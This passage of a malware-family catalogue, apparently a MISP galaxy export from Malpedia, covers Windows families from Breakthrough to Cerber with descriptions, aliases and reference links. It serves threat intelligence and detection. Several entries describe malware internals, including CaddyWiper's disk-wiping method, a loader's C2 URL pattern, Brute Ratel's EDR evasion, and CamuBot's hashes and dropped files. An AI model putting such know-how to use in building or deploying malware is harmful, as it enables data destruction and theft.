Table 3082. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.breach_rat

https://www.fireeye.com/blog/threat-research/2016/06/apt_group_sends_spea.html

Breakthrough

There is no reference available for this family and all known samples have version 1.0.0.

PDB strings in the samples suggest that this is an "exclusive" loader, known as "breakthrough" (maybe), e.g. C:\Users\Exclusiv\Desktop\хп-пробив\Release\build.pdb

The communication URL parameters are fairly unique in this combination: gate.php?hwid=<guid>&os=<OS>&build=1.0.0&cpu=8

<OS> is one of: Windows95 Windows98 WindowsMe Windows95family WindowsNT3 WindowsNT4 Windows2000 WindowsXP WindowsServer2003 WindowsNTfamily WindowsVista Windows7 Windows8 Windows10

The tag is: misp-galaxy:malpedia="Breakthrough"

Breakthrough is also known as:

Table 3083. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.breakthrough_loader

BROKEYOLK

According to Mandiant, BROKEYOLK is a .NET downloader that downloads and executes a file from a hard-coded command and control (C2) server. The malware communicates via SOAP (Simple Object Access Protocol) requests using HTTP.

The tag is: misp-galaxy:malpedia="BROKEYOLK"

BROKEYOLK is also known as:

Table 3086. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brokeyolk

https://www.mandiant.com/media/17826

https://socradar.io/dark-web-profile-apt42-iranian-cyber-espionage-group/

Bruh Wiper

The tag is: misp-galaxy:malpedia="Bruh Wiper"

Bruh Wiper is also known as:

Table 3088. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bruh_wiper

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

Brute Ratel C4

Brute Ratel is a customized Command and Control Center for Red Team and Adversary Simulation.

Its SMB and TCP payloads provide functionality to write custom external C2 channels over legitimate websites such as Slack, Discord, Microsoft Teams and more. It includes a built-in debugger to detect EDR userland hooks, the ability to keep memory artifacts hidden from EDRs and AV, and direct Windows syscalls made on the fly.

The tag is: misp-galaxy:malpedia="Brute Ratel C4"

Brute Ratel C4 is also known as:

  • BruteRatel

Table 3090. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.brute_ratel_c4

https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads-part-2/

https://cybergeeks.tech/a-deep-dive-into-brute-ratel-c4-payloads/

https://www.trendmicro.com/de_de/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html

https://www.splunk.com/en_us/blog/security/deliver-a-strike-by-reversing-a-badger-brute-ratel-detection-and-analysis.html

https://socradar.io/brute-ratel-utilized-by-threat-actors-in-new-ransomware-operations/

https://protectedmo.de/brute.html

https://bruteratel.com/research/feature-update/2021/06/01/PE-Reflection-Long-Live-The-King/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://blog.spookysec.net/analyzing-brc4-badgers/

https://go.recordedfuture.com/hubfs/reports/cta-2023-0808.pdf

https://0xdarkvortex.dev/hiding-in-plainsight/

https://andreafortuna.org/2023/02/23/how-to-detect-brute-ratel-activities

https://twitter.com/MichalKoczwara/status/1652067563545800705

https://michaelkoczwara.medium.com/hunting-c2-with-shodan-223ca250d06f

https://0xdarkvortex.dev/proxying-dll-loads-for-hiding-etwti-stack-tracing/

https://www.youtube.com/watch?v=a7W6rhkpVSM

https://twitter.com/embee_research/status/1580030303950995456?s=20&t=0vfXnrCXaVSX-P-hiSrFwA

https://www.mdsec.co.uk/2022/08/part-3-how-i-met-your-beacon-brute-ratel/

https://web.archive.org/web/20230216110153/https://yoroi.company/research/hunting-cyber-evil-ratels-from-the-targeted-attacks-to-the-widespread-usage-of-brute-ratel/

https://medium.com/walmartglobaltech/brute-ratel-config-decoding-update-7820455022cb

https://unit42.paloaltonetworks.com/brute-ratel-c4-tool/

https://www.mandiant.com/resources/blog/apt29-evolving-diplomatic-phishing

BTCWare

The tag is: misp-galaxy:malpedia="BTCWare"

BTCWare is also known as:

Table 3093. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.btcware

https://www.bleepingcomputer.com/news/security/new-nuclear-btcware-ransomware-released-updated/

BUBBLEWRAP

BUBBLEWRAP is a full-featured backdoor that is set to run when the system boots, and can communicate using HTTP, HTTPS, or a SOCKS proxy. This backdoor collects system information, including the operating system version and hostname, and includes functionality to check, upload, and register plugins that can further enhance its capabilities.

The tag is: misp-galaxy:malpedia="BUBBLEWRAP"

BUBBLEWRAP is also known as:

Table 3094. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bubblewrap

https://attack.mitre.org/software/S0043/

https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html

Buer

Buer is a downloader sold on underground forums and used by threat actors to deliver payload malware onto target machines. It has been observed in email campaigns and has been sold as a service since August 2019.

The tag is: misp-galaxy:malpedia="Buer"

Buer is also known as:

  • Buerloader

  • RustyBuer

Table 3095. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buer

https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://news.sophos.com/en-us/2020/10/28/hacks-for-sale-inside-the-buer-loader-malware-as-a-service/

https://www.area1security.com/blog/trickbot-spear-phishing-drops-bazar-buer-malware/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-006.pdf

https://labs.vipre.com/buer-loader-found-in-an-unusual-email-attachment/

https://research.checkpoint.com/2023/following-the-scent-of-trickgate-6-year-old-packer-used-to-deploy-the-most-wanted-malware/

https://web.archive.org/web/20210305181115/https://cisoclub.ru/doc/otchet-kompanii-group-ib-ransomware-uncovered-2020-2021/?bp-attachment=group-ib_ransomware_uncovered_2020-2021.pdf

https://www.fortinet.com/blog/threat-research/signed-sealed-and-delivered-signed-xll-file-delivers-buer-loader

https://therecord.media/meet-prometheus-the-secret-tds-behind-some-of-todays-malware-campaigns/

https://documents.trendmicro.com/assets/rpt/rpt-navigating-new-frontiers-trend-micro-2021-annual-cybersecurity-report.pdf

https://tehtris.com/en/blog/buer-loader-analysis-a-rusted-malware-program

https://securelist.com/mokes-and-buerak-distributed-under-the-guise-of-security-certificates/96324/

https://medium.com/walmartglobaltech/buerloader-updates-3e34c1949b96

https://krabsonsecurity.com/2019/12/05/buer-loader-new-russian-loader-on-the-market-with-interesting-persistence/

https://www.zscaler.com/blogs/research/spear-phishing-campaign-delivers-buer-and-bazar-malware

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf

https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145

https://twitter.com/StopMalvertisin/status/1182505434231398401

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-leaks-examining-the-panama-papers-of-ransomware.html

https://www.proofpoint.com/us/blog/threat-insight/new-variant-buer-loader-written-rust

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns/TechnicalBrief-An-Analysis-of-Buer-Loader.pdf

https://twitter.com/SophosLabs/status/1321844306970251265

http://www.secureworks.com/research/threat-profiles/gold-blackburn

https://www.trendmicro.com/en_us/research/21/k/a-review-and-analysis-of-2021-buer-loader-campaigns.html

https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/

https://blog.minerva-labs.com/stopping-buerloader

https://blog.group-ib.com/prometheus-tds

https://www.zdnet.com/article/the-malware-that-usually-installs-ransomware-and-you-need-to-remove-right-away/

https://www.proofpoint.com/us/threat-insight/post/buer-new-loader-emerges-underground-marketplace

https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware

http://www.secureworks.com/research/threat-profiles/gold-symphony

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf

BUGHATCH

According to Elastic, BUGHATCH is an in-memory implant loaded by an obfuscated PowerShell script that decodes and executes an embedded shellcode blob in its allocated memory space using common Windows APIs (VirtualAlloc, CreateThread, WaitForSingleObject).

The tag is: misp-galaxy:malpedia="BUGHATCH"

BUGHATCH is also known as:

Table 3097. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bughatch

https://www.elastic.co/security-labs/bughatch-malware-analysis

BumbleBee

This malware is delivered by an ISO file, with a DLL inside with a custom loader. Because of the unique user-agent "bumblebee" this malware was dubbed BUMBLEBEE. At the time of analysis by Google’s Threat Analysis Group (TAG), BumbleBee was observed to fetch Cobalt Strike payloads.

The tag is: misp-galaxy:malpedia="BumbleBee"

BumbleBee is also known as:

  • COLDTRAIN

  • SHELLSTING

  • Shindig

Table 3099. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bumblebee

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://www.infinitumit.com.tr/bumblebee-loader-malware-analysis/

https://research.openanalysis.net/bumblebee/malware/loader/unpacking/2022/05/12/bumblebee_loader.html

https://www.fortinet.com/blog/threat-research/notable-droppers-emerge-in-recent-threat-campaigns

https://www.youtube.com/watch?v=JoKJNfLAc0Y

http://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://www.intrinsec.com/emotet-returns-and-deploys-loaders/

https://www.first.org/resources/papers/conf2023/FIRSTCON23-TLPCLEAR-Staubmann-Busy-Bees.pptx

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti

https://team-cymru.com/blog/2022/05/25/bablosoft-lowering-the-barrier-of-entry-for-malicious-actors/

https://twitter.com/Artilllerie/status/1701250284238823493

https://www.proofpoint.com/us/blog/threat-insight/comprehensive-look-emotets-fall-2022-return

https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/

https://cloudsek.com/technical-analysis-of-bumblebee-malware-loader/

https://blog.talosintelligence.com/following-the-lnk-metadata-trail

https://isc.sans.edu/diary/28636

https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day—​cve-2021-40444—​hits-windows—​tr.html

https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise

https://www.deepinstinct.com/blog/pindos-new-javascript-dropper-delivering-bumblebee-and-icedid

https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/

https://0xtoxin.github.io/malware%20analysis/Bumblebee-DocuSign-Campaign/

https://isc.sans.edu/diary/rss/28664

https://isc.sans.edu/diary/Bumblebee+Malware+from+TransferXL+URLs/28664

https://blog.sekoia.io/bumblebee-a-new-trendy-loader-for-initial-access-brokers/

https://elis531989.medium.com/the-chronicles-of-bumblebee-the-hook-the-bee-and-the-trickbot-connection-686379311056

https://blog.cerbero.io/?p=2617

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q1%20Botnet%20Threat%20Update.pdf

https://research.checkpoint.com/2022/bumblebee-increasing-its-capacity-and-evolving-its-ttps/

https://twitter.com/Intrinsec/status/1699779830294970856

https://thedfirreport.com/2022/09/26/bumblebee-round-two/

https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks

https://isc.sans.edu/diary/rss/28636

https://community.riskiq.com/article/0b211905/description

https://bin.re/blog/the-dga-of-bumblebee/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf

https://research.nccgroup.com/2022/04/29/adventures-in-the-land-of-bumblebee-a-new-malicious-loader/

https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads

https://www.youtube.com/watch?v=pIXl79IPkLI

https://twitter.com/ESETresearch/status/1577963080096555008

https://www.deepinstinct.com/blog/the-dark-side-of-bumblebee-malware-loader

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

https://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/

https://info.spamhaus.com/hubfs/Botnet%20Reports/2023%20Q2%20Botnet%20Threat%20Update.pdf

https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/

https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/

https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/bumblebee-docusign-campaign

https://blog.krakz.fr/articles/bumblebee/

https://www.botconf.eu/wp-content/uploads/formidable/2/2023_4889_DESOUZA.pdf

https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g

https://securityintelligence.com/posts/from-ramnit-to-bumblebee-via-neverquest

https://www.logpoint.com/wp-content/uploads/2022/05/buzz-of-the-bumblebee-a-new-malicious-loader-threat-report-no-3.pdf

https://twitter.com/threatinsight/status/1648330456364883968

https://unit42.paloaltonetworks.com/bumblebee-malware-projector-libra/

https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine

https://twitter.com/Intrinsec/status/1709609529070010447

https://www.aspirets.com/blog/bumblebee-malware-loader-threat-analysis/

https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/

https://www.bleepingcomputer.com/news/security/new-bumblebee-malware-replaces-contis-bazarloader-in-cyberattacks/

https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/

https://www.intezer.com/blog/malware-analysis/how-threat-actors-abuse-lnk-files/

https://threathunt.blog/bzz-bzz-bumblebee-loader

BundleBot

BundleBot is an info stealer that abuses the single-file dotnet bundle, which operates as a self-contained executable that does not require any preinstalled dotnet runtime version. BundleBot functionality targets a wide variety of data including the victim’s system information, browser data, Telegram data, Discord token, Facebook account information, and screenshots.

The tag is: misp-galaxy:malpedia="BundleBot"

BundleBot is also known as:

Table 3101. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.bundlebot

https://research.checkpoint.com/2023/byos-bundle-your-own-stealer/

Buterat

The tag is: misp-galaxy:malpedia="Buterat"

Buterat is also known as:

  • spyvoltar

Table 3103. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buterat

http://antivirnews.blogspot.com/2011/01/backdoorwin32-buteratafj.html

Buzus

The tag is: misp-galaxy:malpedia="Buzus"

Buzus is also known as:

  • Yimfoca

Table 3104. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.buzus

https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Worm:Win32/Yimfoca.A

c0d0so0

The tag is: misp-galaxy:malpedia="c0d0so0"

c0d0so0 is also known as:

Table 3106. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.c0d0so0

CabArt

The tag is: misp-galaxy:malpedia="CabArt"

CabArt is also known as:

Table 3107. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cabart

CaddyWiper

CaddyWiper is another destructive malware believed to be deployed to target Ukraine.

CaddyWiper wipes all files under C:\Users and also all files under available drives from D: to Z: by overwriting the data with NULL values. If the target file is greater than 0xA00000 bytes in size (10MB), it will only wipe the first 0xA00000 bytes.

It also wipes disk partitions from \\.\PHYSICALDRIVE9 to \\.\PHYSICALDRIVE0 by overwriting the first 0x780 bytes with NULL.

The tag is: misp-galaxy:malpedia="CaddyWiper"

CaddyWiper is also known as:

  • KillDisk.NCX

Table 3108. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.caddywiper

https://www.fortinet.com/blog/threat-research/the-increasing-wiper-malware-threat

https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya

https://thehackernews.com/2022/03/caddywiper-yet-another-data-wiping.html

https://services.google.com/fh/files/blogs/google_fog_of_war_research_report.pdf

https://cybersecuritynews.com/destructive-data-wiper-malware/

https://securityintelligence.com/posts/caddywiper-malware-targeting-ukrainian-organizations/

https://www.nioguard.com/2022/03/analysis-of-caddywiper.html

https://blog.talosintelligence.com/2022/03/threat-advisory-caddywiper.html

https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/

https://maxkersten.nl/binary-analysis-course/analysis-scripts/ghidra-script-to-handle-stack-strings/

https://blog.morphisec.com/caddywiper-analysis-new-malware-attacking-ukraine

https://www.mandiant.com/resources/blog/gru-rise-telegram-minions

https://twitter.com/HackPatch/status/1503538555611607042

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/

https://cert.gov.ua/article/39518

https://msrc-blog.microsoft.com/2022/02/28/analysis-resources-cyber-threat-activity-ukraine/

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://n0p.me/2022/03/2022-03-26-caddywiper/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE4Vwwd

https://twitter.com/silascutler/status/1513870210398363651

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-3/

https://www.truesec.com/hub/blog/analysis-of-caddywiper-wiper-targeting-ukraine

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-caddywiper

https://twitter.com/ESETresearch/status/1503436420886712321

https://www.mandiant.com/resources/blog/gru-disruptive-playbook

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war

https://blog.eset.ie/2022/04/12/industroyer2-industroyer-reloaded/

https://blog.malwarebytes.com/threat-intelligence/2022/03/double-header-isaacwiper-and-caddywiper/

https://cert.gov.ua/article/3718487

https://www.nextgov.com/cybersecurity/2022/03/ukrainian-cyber-lead-least-4-types-malware-are-targeting-ukrainian-institutions/363558/

https://cybernews.com/cyber-war/new-destructive-wiper-malware-deployed-in-ukraine/

https://www.welivesecurity.com/2022/03/15/caddywiper-new-wiper-malware-discovered-ukraine/

https://www.fortinet.com/blog/threat-research/the-year-of-the-wiper

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/

https://blogs.microsoft.com/on-the-issues/2022/12/03/preparing-russian-cyber-offensive-ukraine/

https://www.splunk.com/en_us/blog/security/threat-update-caddywiper.html

https://cybersecurity.att.com/blogs/labs-research/analysis-on-recent-wiper-attacks-examples-and-how-they-wiper-malware-works

https://www.youtube.com/watch?v=mrTdSdMMgnk

https://securityaffairs.co/wordpress/129069/cyber-warfare-2/caddywiper-wiper-hits-ukraine.html

https://www.bleepingcomputer.com/news/security/new-caddywiper-data-wiping-malware-hits-ukrainian-networks/

CadelSpy

CadelSpy is a spyware supposedly used by Iranian threat actors. It has several functions such as logging keystrokes, recording audio, capturing screenshots and webcam photos, and stealing any documents that are sent to a printer.

The tag is: misp-galaxy:malpedia="CadelSpy"

CadelSpy is also known as:

  • Cadelle

Table 3109. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cadelspy

https://web.archive.org/web/20191221064439/https://www.symantec.com/connect/blogs/iran-based-attackers-use-back-door-threats-spy-middle-eastern-targets

http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/CadelSpy-Remexi-IOC.pdf

Cameleon

PWC describes this malware as a backdoor, capable of file management, upload and download of files, and execution of commands.

The tag is: misp-galaxy:malpedia="Cameleon"

Cameleon is also known as:

  • StormKitty

Table 3111. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cameleon

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/threat-actor-of-in-tur-est.html

CamuBot

There are not many IOCs in this article, so we took one sample and tried to extract some interesting IOCs; our findings are below:

CamuBot sample: 37ca2e37e1dc26d6b66ba041ed653dc8ee43e1db71a705df4546449dd7591479

Dropped files on disk:

C:\Users\user~1\AppData\Local\Temp\protecao.exe: 0af612461174eedec813ce670ba35e74a9433361eacb3ceab6d79232a6fe13c1

C:\Users\user~1\AppData\Local\Temp\Renci.SshNet.dll: 3E3CD9E8D94FC45F811720F5E911B892A17EE00F971E498EAA8B5CAE44A6A8D8

C:\ProgramData\m.msi: AD90D4ADFED0BDCB2E56871B13CC7E857F64C906E2CF3283D30D6CFD24CD2190

Protecao.exe tries to download hxxp://www.usb-over-network.com/usb-over-network-64bit.msi

A new driver is installed: C:\Windows\system32\drivers\ftusbload2.sys: 9255E8B64FB278BC5FFE5B8F70D68AF8

ftusbload2.sys sets 28 IRP handlers.

The tag is: misp-galaxy:malpedia="CamuBot"

CamuBot is also known as:

Table 3113. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.camubot

https://securityintelligence.com/camubot-new-financial-malware-targets-brazilian-banking-customers/

Cannibal Rat

Cannibal Rat is a Python-written remote access trojan with 4 versions as of March 2018. The RAT is reported to impact users of a Brazilian public sector management school. The RAT is distributed in a py2exe format, with the python27.dll and the Python bytecode stored as a PE resource and the additional libraries zipped in the overlay of the executable.

The tag is: misp-galaxy:malpedia="Cannibal Rat"

Cannibal Rat is also known as:

Table 3114. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cannibal_rat

http://blog.talosintelligence.com/2018/02/cannibalrat-targets-brazil.html

Carbanak

MyCERT states that Carbanak is a remote backdoor designed for espionage, data exfiltration, and remote control.

The attacker deploys malware via spear phishing email to lure the user into opening and running the malicious attachment that will infect the machine. The main objective of this campaign is primarily to remotely control the infected machine and gain control of the internal destinations of money processing services such as Automated Teller Machines (ATM) and financial accounts. The following information describes the malware capabilities:

The tag is: misp-galaxy:malpedia="Carbanak"

Carbanak is also known as:

  • Anunak

  • Sekur RAT

Table 3116. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.carbanak

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://threatintel.blog/OPBlueRaven-Part1/

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-two-continuing-source-code-analysis.html

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://www.brighttalk.com/webcast/15591/382191/fin7-apt-how-billion-dollar-crime-ring-remains-active-after-leaders-arrest

https://cocomelonc.github.io/book/2023/12/13/malwild-book.html

https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.secureworks.com/research/threat-profiles/gold-niagara

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-three-behind-the-backdoor.html

https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf

https://www.mandiant.com/resources/evolution-of-fin7

https://app.box.com/s/p7qzcury97tuwk26694uutujwqmwqyhe

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html

https://therecord.media/two-carbanak-hackers-sentenced-to-eight-years-in-prison-in-kazakhstan/

https://www.prodaft.com/m/reports/FIN7_TLPCLEAR.pdf

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-one-a-rare-occurrence.html

https://www.mandiant.com/resources/blog/evolution-of-fin7

https://www.fireeye.com/blog/threat-research/2019/04/carbanak-week-part-four-desktop-video-player.html

https://unit42.paloaltonetworks.com/atoms/mulelibra/

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-1/

https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf

https://www.fireeye.com/blog/threat-research/2017/06/behind-the-carbanak-backdoor.html

https://threatintel.blog/OPBlueRaven-Part2/

Cardinal RAT

Cardinal RAT is a remote access Trojan capable of stealing username and credentials, cleaning out cookies from browsers, keylogging and capturing screenshots on targeted systems. It is delivered via a downloader dubbed “Carp” which uses malicious macros in Microsoft Excel documents to compile embedded source code into an executable, which then deploys the Cardinal RAT malware family.

The tag is: misp-galaxy:malpedia="Cardinal RAT"

Cardinal RAT is also known as:

Table 3118. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cardinal_rat

https://www.picussecurity.com/blog/picus-10-critical-mitre-attck-techniques-t1055-process-injection

https://cocomelonc.github.io/malware/2022/07/30/malware-av-evasion-8.html

https://cocomelonc.github.io/tutorial/2021/09/06/simple-malware-av-evasion-2.html

https://www.clearskysec.com/wp-content/uploads/2019/08/ClearSky-2019-H1-Cyber-Events-Summary-Report.pdf

https://cocomelonc.github.io/tutorial/2021/09/04/simple-malware-av-evasion.html

https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/

http://researchcenter.paloaltonetworks.com/2017/04/unit42-cardinal-rat-active-two-years/?adbsc=social71702736&adbid=855028404965433346&adbpl=tw&adbpr=4487645412

CargoBay

CargoBay is a newer malware family which was first observed in 2022 and is notable for being written in the Rust language. CargoBay is likely based on source code taken from the 'Black Hat Rust' GitHub project (https://github.com/skerkour/black-hat-rust). CargoBay is usually distributed via phishing emails, and the malware binaries may be disguised as legitimate applications. Upon execution, the malware starts by performing environmental checks such as checking its execution path and the configured system language. If the tests pass, the malware proceeds to gather basic system information and register with its C2 via HTTP, from which it receives JSON-formatted jobs to carry out. CargoBay can execute commands via the command line and download additional malware binaries.

The tag is: misp-galaxy:malpedia="CargoBay"

CargoBay is also known as:

Table 3119. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cargobay

https://exchange.xforce.ibmcloud.com/malware-analysis/guid:87abff769352d8208e403331c86eb95f

CARROTBALL

CARROTBALL is a simple FTP downloader built to deploy SYSCON, a Remote Access Trojan used by the same threat actor. Discovered by Unit 42 in late 2019, the downloader was adopted for use in spear phishing attacks against US government agencies.

The tag is: misp-galaxy:malpedia="CARROTBALL"

CARROTBALL is also known as:

Table 3120. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.carrotball

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

Casper

ESET describes Casper as a well-developed reconnaissance tool, making extensive efforts to remain unseen on targeted machines. Of particular note are the specific strategies adopted against anti-malware software. Casper was used against Syrian targets in April 2014, which makes it the most recent malware from this group publicly known at this time.

The tag is: misp-galaxy:malpedia="Casper"

Casper is also known as:

Table 3122. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.casper

https://www.welivesecurity.com/2015/03/05/casper-malware-babar-bunny-another-espionage-cartoon/

Catchamas

The tag is: misp-galaxy:malpedia="Catchamas"

Catchamas is also known as:

Table 3124. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.catchamas

https://www.symantec.com/blogs/threat-intelligence/thrip-hits-satellite-telecoms-defense-targets

CCleaner Backdoor

According to CrowdStrike, this backdoor was discovered embedded in the legitimate, signed version of CCleaner 5.33, and thus constitutes a supply chain attack.

The tag is: misp-galaxy:malpedia="CCleaner Backdoor"

CCleaner Backdoor is also known as:

  • DIRTCLEANER

Table 3125. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ccleaner_backdoor

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

http://blog.talosintelligence.com/2017/09/avast-distributes-malware.html

https://stmxcsr.com/persistence/print-processor.html

https://blog.avast.com/avast-threat-labs-analysis-of-ccleaner-incident

https://www.secureworks.com/research/threat-profiles/bronze-atlas

http://www.intezer.com/evidence-aurora-operation-still-active-part-2-more-ties-uncovered-between-ccleaner-hack-chinese-hackers/

https://blog.avast.com/additional-information-regarding-the-recent-ccleaner-apt-security-incident

https://www.crowdstrike.com/blog/in-depth-analysis-of-the-ccleaner-backdoor-stage-2-dropper-and-its-payload/

https://risky.biz/whatiswinnti/

https://blog.avast.com/update-ccleaner-attackers-entered-via-teamviewer

https://www.mandiant.com/resources/pe-file-infecting-malware-ot

https://securelist.com/big-threats-using-code-similarity-part-1/97239/

https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf

https://twitter.com/craiu/status/910148928796061696

http://blog.morphisec.com/morphisec-discovers-ccleaner-backdoor

https://www.wired.com/story/ccleaner-malware-targeted-tech-firms

https://www.crowdstrike.com/blog/protecting-software-supply-chain-deep-insights-ccleaner-backdoor/

http://www.intezer.com/evidence-aurora-operation-still-active-supply-chain-attack-through-ccleaner/

http://blog.talosintelligence.com/2017/09/ccleaner-c2-concern.html

https://www.ptsecurity.com/upload/corporate/ru-ru/pt-esc/winnti-2020-rus.pdf

https://blog.avast.com/progress-on-ccleaner-investigation

CEELOADER

Mandiant characterizes this malware as a downloader and shellcode stager.

The tag is: misp-galaxy:malpedia="CEELOADER"

CEELOADER is also known as:

Table 3126. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.ceeloader

https://www.mandiant.com/resources/blog/russian-targeting-gov-business

CenterPOS

The tag is: misp-galaxy:malpedia="CenterPOS"

CenterPOS is also known as:

  • cerebrus

Table 3127. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.centerpos

https://www.fireeye.com/blog/threat-research/2016/01/centerpos_an_evolvi.html

Cerber

A prolific ransomware which originally added ".cerber" as a file extension to encrypted files. It has undergone multiple iterations in which the extension has changed. It uses a very readily identifiable set of UDP activity to check in and report infections, and primarily uses TOR for payment information.

The tag is: misp-galaxy:malpedia="Cerber"

Cerber is also known as:

Table 3128. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.cerber

https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus

